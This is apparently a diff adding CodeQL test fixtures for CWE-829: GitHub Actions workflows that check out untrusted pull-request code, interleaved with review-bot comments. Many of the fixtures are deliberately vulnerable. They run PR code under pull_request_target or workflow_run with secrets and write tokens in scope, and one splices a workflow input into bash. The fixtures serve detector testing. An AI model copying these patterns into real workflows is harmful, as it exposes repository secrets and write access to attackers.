ubuntu-latest + needs: setup + if: github.event.workflow_run.conclusion == 'success' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. 
+ outputs: + zip_url: ${{ steps.run.outputs.zip_url }} + any_plugins: ${{ steps.run.outputs.any_plugins }} + steps: + - uses: actions/checkout@v4 + + - name: Find artifact + id: run + env: + TOKEN: ${{ github.token }} + URL: ${{ github.event.workflow_run.artifacts_url }} + run: | + for (( i=1; i<=5; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Fetch list of artifacts (attempt $i/5)" + JSON="$(curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$URL" + )" + echo "$JSON" + echo "::endgroup::" + ZIPURL="$(jq -r '.artifacts | map( select( .name == "jetpack-build" ) ) | sort_by( .created_at ) | last | .archive_download_url // empty' <<<"$JSON")" + PLUGINS="$(jq -r '.artifacts[] | select( .name == "plugins.tsv" )' <<<"$JSON")" + if [[ -n "$ZIPURL" ]]; then + break + fi + done + [[ -z "$ZIPURL" ]] && { echo "::error::Failed to find artifact."; exit 1; } + echo "Zip URL: $ZIPURL" + echo "zip_url=${ZIPURL}" >> "$GITHUB_OUTPUT" + if [[ -z "$PLUGINS" ]]; then + echo "Any plugins? No" + echo "any_plugins=false" >> "$GITHUB_OUTPUT" + else + echo "Any plugins? Yes" + echo "any_plugins=true" >> "$GITHUB_OUTPUT" + fi + + - name: Get token + id: get_token + if: ${{ ! success() }} + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + - name: 'Mark "Test plugin upgrades" failed' + if: ${{ ! success() }} + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: failure + title: Failed to find build artifact + summary: | + ${{ env.SUMMARY }} + + Post-build run aborted because the "Find artifact" step failed. + token: ${{ steps.get_token.outputs.token }} + + no_plugins: + name: Handle no-plugins + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'false' + timeout-minutes: 2 # 2022-08-26: Seems like it should be fast. 
+ steps: + - uses: actions/checkout@v4 + + - name: Get token + id: get_token + uses: ./.github/actions/gh-app-token + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: 'Mark "Test plugin upgrades" skipped' + uses: ./.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: skipped + title: No plugins were built + summary: | + ${{ env.SUMMARY }} + + Post-build run skipped because no plugins were built. + token: ${{ steps.get_token.outputs.token }} + + upgrade_test: + name: Test plugin upgrades + runs-on: ubuntu-latest + needs: [ setup, find_artifact ] + if: needs.find_artifact.outputs.any_plugins == 'true' + timeout-minutes: 15 # 2022-08-26: Successful runs seem to take about 6 minutes, but give some extra time for the downloads. + services: + db: + image: mariadb:lts + env: + MARIADB_ROOT_PASSWORD: wordpress + ports: + - 3306:3306 + options: --health-cmd="healthcheck.sh --su-mysql --connect --innodb_initialized" --health-interval=10s --health-timeout=5s --health-retries=5 + container: + image: ghcr.io/automattic/jetpack-wordpress-dev:latest + env: + WP_DOMAIN: localhost + WP_ADMIN_USER: wordpress + WP_ADMIN_EMAIL: wordpress@example.com + WP_ADMIN_PASSWORD: wordpress + WP_TITLE: Hello World + MYSQL_HOST: db:3306 + MYSQL_DATABASE: wordpress + MYSQL_USER: root + MYSQL_PASSWORD: wordpress + HOST_PORT: 80 + ports: + - 80:80 + steps: + - uses: actions/checkout@v4 + with: + path: trunk + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.workflow_run.head_commit.id }} + path: commit + + - name: Get token + id: get_token + uses: ./trunk/.github/actions/gh-app-token + env: + # Work around a weird node 16/openssl 3 issue in the docker env + OPENSSL_CONF: '/dev/null' + with: + app_id: ${{ secrets.JP_LAUNCH_CONTROL_ID }} + private_key: ${{ secrets.JP_LAUNCH_CONTROL_KEY }} + + - name: Notify check in progress + uses: ./trunk/.github/actions/check-run + with: + id: ${{ 
needs.setup.outputs.upgrade_check }} + status: in_progress + title: Test started... + summary: | + ${{ env.SUMMARY }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} + + - name: Download build artifact + env: + TOKEN: ${{ github.token }} + ZIPURL: ${{ needs.find_artifact.outputs.zip_url }} + shell: bash + run: | + for (( i=1; i<=2; i++ )); do + [[ $i -gt 1 ]] && sleep 10 + echo "::group::Downloading artifact (attempt $i/2)" + curl -v -L --get \ + --header "Authorization: token $TOKEN" \ + --url "$ZIPURL" \ + --output "artifact.zip" + echo "::endgroup::" + if [[ -e "artifact.zip" ]] && zipinfo artifact.zip &>/dev/null; then + break + fi + done + [[ ! -e "artifact.zip" ]] && { echo "::error::Failed to download artifact."; exit 1; } + unzip artifact.zip + tar --xz -xvvf build.tar.xz build + + - name: Setup WordPress + run: trunk/.github/files/test-plugin-update/setup.sh + + - name: Prepare plugin zips + id: zips + run: trunk/.github/files/test-plugin-update/prepare-zips.sh + + - name: Test upgrades + id: tests + run: trunk/.github/files/test-plugin-update/test.sh + + - name: Notify final status + if: always() + uses: ./trunk/.github/actions/check-run + with: + id: ${{ needs.setup.outputs.upgrade_check }} + conclusion: ${{ job.status }} + title: ${{ job.status == 'success' && 'Tests passed' || job.status == 'cancelled' && 'Cancelled' || 'Tests failed' }} + summary: | + ${{ env.SUMMARY }} + + ${{ steps.zips.outputs.info }}${{ steps.tests.outputs.info }} + + See run [#${{ github.run_id }}](${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}) for details. + token: ${{ steps.get_token.outputs.token }} 
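Review bot: The `upgrade_test` job checks out `github.event.workflow_run.head_commit.id` into `commit/` but every `run:` step invokes scripts from the `trunk/` checkout, and the workflow runs with read-only permissions; whether the fixture is the "untrusted code checked out but not executed" case is not stated anywhere. A comment on the second checkout, `# head commit is checked out for the upgrade test only; all scripts run from trunk/`, would record that intent. Separately, both `curl -v` loops print the `Authorization` header to the step log; the runner masks `github.token`, but `-sS` keeps the request quiet without hiding errors.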
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml new file mode 100644 index 000000000000..f679b772e340 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -0,0 +1,23 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Checkout PR code + uses: actions/checkout@v3 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml new file mode 100644 index 000000000000..6347db51e3c9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml 
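Review bot: The checkout uses `head_repository.full_name` plus `head_branch` from the completed `workflow_run`, so the code scanned can differ from the commit the Build run actually validated; a comment stating that the branch-name form is the deliberate variant would help, since `head_sha` is also available in the payload. `sonarsource/sonarcloud-github-action@master` is a mutable tag that runs with `SONAR_TOKEN` and `GITHUB_TOKEN`, and test18.yml uses the same unpinned reference; if the fixtures are copied from real repositories that is worth a note so the pin is not mistaken for something the query should flag.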
@@ -0,0 +1,41 @@ +name: Sonar +on: + workflow_run: + workflows: [PR Build] + types: [completed] +jobs: + sonar: + runs-on: ubuntu-latest + timeout-minutes: 30 + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: Download artifacts + uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "rsc-pr-build-artifacts" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); + + - name: Unzip artifacts + run: unzip rsc-pr-build-artifacts.zip + + - name: SonarCloud Scan + uses: sonarsource/sonarcloud-github-action@master + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml new file mode 100644 index 000000000000..c4f90b97d05b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test19.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd 
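Review bot: `matchArtifact` is taken as `.filter(...)[0]` with no existence check, so when the triggering run produced no `rsc-pr-build-artifacts` the next line throws on `matchArtifact.id` with an unhelpful TypeError rather than a named failure. One guard before the download, `if (!matchArtifact) { core.setFailed('rsc-pr-build-artifacts not found'); return; }`, makes the failure explicit. The archive from the untrusted run is then unzipped straight into the workspace before the scan; a comment saying that this artifact-sourced variant is the intended CWE-829 case would document the fixture.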
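Review bot: test19.yml and test20.yml are byte-identical except for `ref: ${{ github.event.pull_request.head.ref }}` versus `head.sha`, and nothing explains why they are two fixtures. With `synchronize` in the trigger types and the `safe to test` label evaluated when the job starts, the branch form can move after the label was applied while the sha form cannot, which is presumably the distinction under test. A comment above the checkout in each file, `# label gate + branch ref: ref can change after labelling` and `# label gate + pinned sha`, would make that difference legible.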
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml new file mode 100644 index 000000000000..64e4992b5caf --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml @@ -0,0 +1,20 @@ +name: "Frogbot Scan Pull Request" +on: + pull_request_target: + types: [ opened, synchronize ] +permissions: + pull-requests: write + contents: read +jobs: + scan-pull-request: + runs-on: ubuntu-latest + environment: frogbot + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - uses: jfrog/frogbot@8fbeca612957ae5f5f0c03a19cb6e59e237026f3 # v2.10.0 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + JF_GIT_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml new file mode 100644 index 000000000000..942b17967d32 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test20.yml @@ -0,0 +1,22 @@ +on: + pull_request_target: + types: [ opened, synchronize ] + +permissions: {} +jobs: + test: + permissions: + contents: write + pull-requests: write + + runs-on: ubuntu-latest + env: + GITHUB_TOKEN: "${{ secrets.GITHUB_TOKEN }}" + steps: + - name: Checkout repo for OWNER TEST + uses: actions/checkout@v4 + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml new file mode 100644 index 000000000000..3bb48221225c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml 
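Review bot: `environment: frogbot` is the only thing standing between the `pull_request_target` trigger and the checkout of `head.sha` with `JF_ACCESS_TOKEN` in scope, and the fixture does not say whether an environment reference is meant to count as an approval gate for the query. A comment on the job, `# gate: environment protection rules on 'frogbot'`, would record that. `actions/checkout@v2` is also a retired major; if the fixture is a verbatim copy of a real workflow a note to that effect avoids a needless bump later.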
@@ -0,0 +1,27 @@ +on: + push: + branches: [main] + pull_request: + branches: [main] + workflow_dispatch: + inputs: + publish_docs: + description: "pub" + default: true + type: boolean + +jobs: + Docs: + if: github.repository == 'test/test' + runs-on: macos-14 + steps: + - name: Checkout Repository + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ secrets.GITHUB_TOKEN }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + - run: | + # NOT VULNERABLE + python docs/build_docs.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml new file mode 100644 index 000000000000..2f3b0bb876f6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml 
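Review bot: The `# NOT VULNERABLE` marker sits inside the `run:` script, two steps below the `actions/checkout@v4` step where a CWE-829 alert would be reported, so it is easy to miss when reading the fixture against the .expected output. Moving it to a YAML comment directly above the checkout step, `# NOT VULNERABLE: pull_request trigger, token is read-only for forks`, puts the explanation where the finding would appear. The reasoning itself (the `pull_request` event rather than `pull_request_target`) is inferred from the triggers and worth stating in that comment.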
@@ -0,0 +1,62 @@
+on:
+ pull_request:
+ push:
+ branches:
+ - trunk
+ - 'release/**'
+ - 'wp/**'
+ workflow_dispatch:
+ inputs:
+ version:
+ description: ''
+ required: true
+
+jobs:
+ bump-version:
+ name: Bump version
+ runs-on: ubuntu-latest
+ outputs:
+ release_branch: ${{ steps.get_version.outputs.release_branch }}
+
+ steps:
+ - name: Compute old and new version
+ id: get_version
+ run: |
+ OLD_VERSION=$(jq --raw-output '.version' package.json)
+ echo "old_version=${OLD_VERSION}" >> $GITHUB_OUTPUT
+ if [[ ${{ github.event.inputs.version }} == 'stable' ]]; then
+ NEW_VERSION=$(npx semver $OLD_VERSION -i patch)
+ else
+ if [[ $OLD_VERSION == *"rc"* ]]; then
+ NEW_VERSION=$(npx semver $OLD_VERSION -i prerelease)
+ else
+ # WordPress version guidelines: If minor is 9, bump major instead.
+ IFS='.' read -r -a OLD_VERSION_ARRAY <<< "$OLD_VERSION"
+ if [[ ${OLD_VERSION_ARRAY[1]} == "9" ]]; then
+ NEW_VERSION="$(npx semver $OLD_VERSION -i major)-rc.1"
+ else
+ NEW_VERSION="$(npx semver $OLD_VERSION -i minor)-rc.1"
+ fi
+ fi
+ fi
+ echo "new_version=${NEW_VERSION}" >> $GITHUB_OUTPUT
+ IFS='.' read -r -a NEW_VERSION_ARRAY <<< "$NEW_VERSION"
+ RELEASE_BRANCH="release/${NEW_VERSION_ARRAY[0]}.${NEW_VERSION_ARRAY[1]}"
+ echo "release_branch=${RELEASE_BRANCH}" >> $GITHUB_OUTPUT
+
+ build:
+ runs-on: ubuntu-latest
+ needs: bump-version
+ if: |
+ always() && (
+ github.event_name == 'pull_request' ||
+ github.event_name == 'workflow_dispatch' ||
+ github.repository == 'test/test'
+ )
+ steps:
+ - name: Checkout code
+ uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1
+ with:
+ ref: ${{ needs.bump-version.outputs.release_branch || github.ref }}
+
+ - run: ./bin/build-plugin-zip.sh
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml
new file mode 100644
index 000000000000..da889dd2ac6f
--- /dev/null
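Review bot: `${{ github.event.inputs.version }}` is spliced directly into the bash `[[ ... ]]` test in the `get_version` step; on the `push` and `pull_request` triggers this workflow also declares the input is empty, so the line becomes `if [[ == 'stable' ]]` and bash rejects it, and on `workflow_dispatch` the raw input is interpreted by the shell. Passing the value through the environment fixes both: add `env:` / `VERSION: ${{ github.event.inputs.version }}` to the step and test `if [[ "$VERSION" == 'stable' ]]; then`. If the fixture keeps the interpolation on purpose for a different query, a one-line comment saying so would stop the next reader from "fixing" it.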
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml
@@ -0,0 +1,47 @@
+on:
+ schedule:
+ - cron: "0 3 * * 2-6" # Tuesdays - Saturdays, at 3am UTC
+ workflow_dispatch:
+ inputs:
+ pr:
+ description: "PR Number"
+ required: false
+ type: number
+ release:
+ types: [ published ]
+
+jobs:
+ resolve-required-data:
+ name: Resolve Required Data
+ if: ${{ github.repository_owner == 'test' }}
+ runs-on: ubuntu-latest
+ outputs:
+ ref: ${{ steps.script.outputs.ref }}
+ steps:
+ - name: Resolve and set checkout and version data to use for release
+ id: script
+ uses: actions/github-script@v7
+ env:
+ PR_NUMBER: ${{ github.event.inputs.pr }}
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ script: |
+ const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js');
+ await script({ github, context, core });
+
+ build:
+ needs: [ resolve-required-data ]
+ if: ${{ github.repository_owner == 'test' }}
+ name: stable
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ repository: ${{ needs.resolve-required-data.outputs.repo }}
+ ref: ${{ needs.resolve-required-data.outputs.ref }}
+
+ - name: Build
+ shell: bash
+ run: |
+ ./cmd
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml
new file mode 100644
index 000000000000..8502d081a734
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml
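Review bot: The `build` job reads `needs.resolve-required-data.outputs.repo`, but `resolve-required-data` declares only `ref` under `outputs:`, so `repository:` on the checkout step resolves to an empty string at run time. Either add `repo: ${{ steps.script.outputs.repo }}` next to `ref:` in that job's `outputs:` block or drop the `repository:` line; as written the fixture cannot model a checkout from a foreign repository, which appears to be what this step is meant to exercise.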
@@ -0,0 +1,20 @@
+on: [ workflow_dispatch, pull_request ]
+jobs:
+ test:
+ runs-on: ubuntu-20.04
+ if: github.event_name == 'pull_request'
+ steps:
+ - name: Check out repository code
+ uses: actions/checkout@v2
+
+ - name: Fetch base and head on PR
+ if: ${{ github.event.pull_request.base.sha }}
+ run: |
+ git fetch origin master ${{ github.event.pull_request.base.sha }}
+ git fetch origin master ${{ github.event.pull_request.head.sha }}
+
+ - name: Check that Pull Request includes updating the Version
+ run: |
+ git show ${{ github.event.pull_request.base.sha }}:src/mplfinance/_version.py > scripts/tv0.py
+ git show ${{ github.sha }}:src/mplfinance/_version.py > scripts/tv1.py
+ python scripts/version_update_check.py tv0 tv1
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml
new file mode 100644
index 000000000000..c825cc73813b
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml
@@ -0,0 +1,42 @@
+on:
+ workflow_run:
+ workflows: [ "build" ]
+ types: [ completed ]
+
+defaults:
+ run:
+ shell: bash
+
+jobs:
+ publish-build-scans:
+ name: Build scan publish
+ if: github.repository == 'test/test' && github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion != 'cancelled'
+ runs-on: ubuntu-latest
+ steps:
+ # Checkout target branch which has trusted code
+ - name: Check out target branch
+ uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ ref: ${{ github.ref }}
+ - name: Download build scan
+ id: downloadBuildScan
+ uses: actions/download-artifact@v4
+ with:
+ name: build-scan
+ github-token: ${{ github.token }}
+ repository: ${{ github.repository }}
+ run-id: ${{ github.event.workflow_run.id }}
+ # Don't fail a build if the file doesn't exist
+ continue-on-error: true
+ - name: Extract previously uploaded build scan content
+ if: ${{ steps.downloadBuildScan.outcome != 'failure'}}
+ run: tar -xzf build-scan.tgz -C ~
+ - name: Publish
+ if: ${{ steps.downloadBuildScan.outcome != 'failure'}}
+ # Don't fail a build if publishing fails
+ continue-on-error: true
+ run: |
+ ./gradlew buildScanPublishPrevious
+ env:
+ ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }}
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml
new file mode 100644
index 000000000000..32f45698a561
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml
@@ -0,0 +1,22 @@
+on:
+ schedule:
+ - cron: '7 18 * * *'
+ workflow_run:
+ workflows: [Trigger]
+ types: [completed]
+ workflow_dispatch:
+jobs:
+ resolve:
+ if: (github.repository == 'test/test' && (github.event_name != 'workflow_run' || github.event.workflow_run.conclusion == 'success')) || github.event_name == 'workflow_dispatch'
+ uses: ./.github/workflows/resolve-args.yml
+ with:
+ comment: "foo"
+ scale:
+ permissions:
+ id-token: write
+ statuses: write
+ needs: [resolve]
+ if: needs.resolve.outputs.SHOULD_RUN == 'true'
+ uses: ./.github/workflows/test27.yml
+ with:
+ git_ref: ${{ needs.resolve.outputs.GIT_REF }}
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml
new file mode 100644
index 000000000000..b1d776ef6c8a
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml
@@ -0,0 +1,22 @@
+on:
+ workflow_dispatch:
+ inputs:
+ git_ref:
+ description: ref
+ type: string
+ workflow_call:
+ inputs:
+ git_ref:
+ type: string
+jobs:
+ run:
+ permissions:
+ id-token: write
+ statuses: write
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2
+ with:
+ ref: ${{ inputs.git_ref }}
+ - run: |
+ ./cmd
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml
new file mode 100644
index 000000000000..5f67fecc09a5
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml
@@ -0,0 +1,20 @@
+on:
+ pull_request_target:
+ types: [opened, ready_for_review, synchronize, reopened, labeled, unlabeled]
+ branches:
+ - main
+
+permissions:
+ contents: read
+
+jobs:
+ setup-environment:
+ permissions:
+ contents: write
+ runs-on: ubuntu-latest
+ if: ${{ !contains(github.event.pull_request.labels.*.name, 'major-update') && (github.actor == 'renovate[bot]' || contains(github.event.pull_request.labels.*.name, 'renovatebot')) }}
+ steps:
+ - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1
+ with:
+ ref: ${{ github.head_ref }}
+ - run: make foo
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
new file mode 100644
index 000000000000..cc7f71a7b3e4
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml
@@ -0,0 +1,21 @@
+on: pull_request_target
+
+jobs:
+ test:
+ permissions: write-all
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ fetch-depth: 0
+
+ - uses: actions/github-script@v5
+ with:
+ github-token: ${{secrets.GITHUB_TOKEN}}
+ script: |
+ const {
+ foo
+ } = require('./foo');
+
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
new file mode 100644
index 000000000000..d9aa2973e007
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml
@@ -0,0 +1,41 @@
+name: "Test"
+permissions:
+ actions: none
+ checks: none
+ contents: read
+ deployments: none
+ id-token: none
+ issues: none
+ discussions: none
+ packages: none
+ pages: none
+ pull-requests: read
+ repository-projects: none
+ security-events: none
+ statuses: none
+on:
+ pull_request_target:
+ types:
+ - opened
+ - edited
+ - synchronize
+
+jobs:
+ main:
+ name: Test Pull Request
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+ - run: npm install
+ working-directory: scripts/github-actions/semantic-pull-request/
+ - name: Lint PR Title
+ if: github.event_name == 'pull_request_target'
+ uses: actions/github-script@v7
+ with:
+ script: |
+ const verifyPullRequest = require('./scripts/github-actions/semantic-pull-request')
+ await verifyPullRequest({ context, core, github })
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
new file mode 100644
index 000000000000..f82f493cd6e0
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
@@ -0,0 +1,47 @@
+name: Publish
+
+on:
+ push:
+ branches:
+ - main
+ pull_request_target:
+ workflow_dispatch:
+ workflow_call:
+
+jobs:
+ build-and-upload:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+
+ - name: Checkout PR
+ if: ${{ github.event_name == 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: ${{ github.event.pull_request.head.ref }}
+ repository: ${{ github.event.pull_request.head.repo.full_name }}
+
+ - name: Checkout
+ if: ${{ github.event_name != 'pull_request_target' }}
+ uses: actions/checkout@v3
+ with:
+ ref: main
+
+ - name: Setup Pages
+ uses: actions/configure-pages@v1
+ - name: Use Node.js
+ uses: actions/setup-node@v3
+ with:
+ node-version: 18
+ cache: npm
+ - name: Update npm to latest
+ run: npm i --prefer-online --no-fund --no-audit -g npm@latest
+ - run: npm -v
+ - run: npm i --ignore-scripts --no-audit --no-fund --package-lock
+ - run: npm run build -w www
+ - name: Upload artifact
+ uses: actions/upload-pages-artifact@v1
+ with:
+ path: './workspaces/www/build'
+ - run: python2.7 foo.py
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml
new file mode 100644
index 000000000000..a4acd7387660
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test5.yml
@@ -0,0 +1,68 @@
+# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml
+name: Comment Triggered Test
+on:
+ issue_comment:
+ types: [created]
+permissions: 'write-all'
+jobs:
+ test1:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+
+ - uses: actions/github-script@v6
+ name: Get PR branch
+ id: issue
+ with:
+ script: |
+ const pr = context.payload.issue.number
+ const data = await github.rest.pulls.get({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: pr
+ })
+ return {
+ ref: data.data.head.ref,
+ sha: data.data.head.sha,
+ }
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: ${{ fromJson(steps.issue.outputs.result).sha }}
+ - run: bash comment_example/tests.sh
+
+ test2:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+
+ - uses: actions/github-script@v6
+ name: Get PR branch
+ id: issue
+ with:
+ script: |
+ const pr = context.payload.issue.number
+ const data = await github.rest.pulls.get({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: pr
+ })
+ return {
+ ref: data.data.head.ref,
+ sha: data.data.head.sha,
+ }
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: ${{ fromJson(steps.issue.outputs.result).ref }}
+ - run: bash comment_example/tests.sh
+
+ test3:
+ if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }}
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ submodules: recursive
+ ref: "refs/pull/${{ github.event.number }}/merge"
+ - run: bash comment_example/tests.sh
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml
new file mode 100644
index 000000000000..f532e4266ad1
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test6.yml
@@ -0,0 +1,45 @@
+name: Test
+
+
+on:
+ workflow_run:
+ workflows: ["Foo"]
+ types:
+ - completed
+
+jobs:
+ docker:
+ runs-on: ubuntu-latest
+ if: >
+ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success'
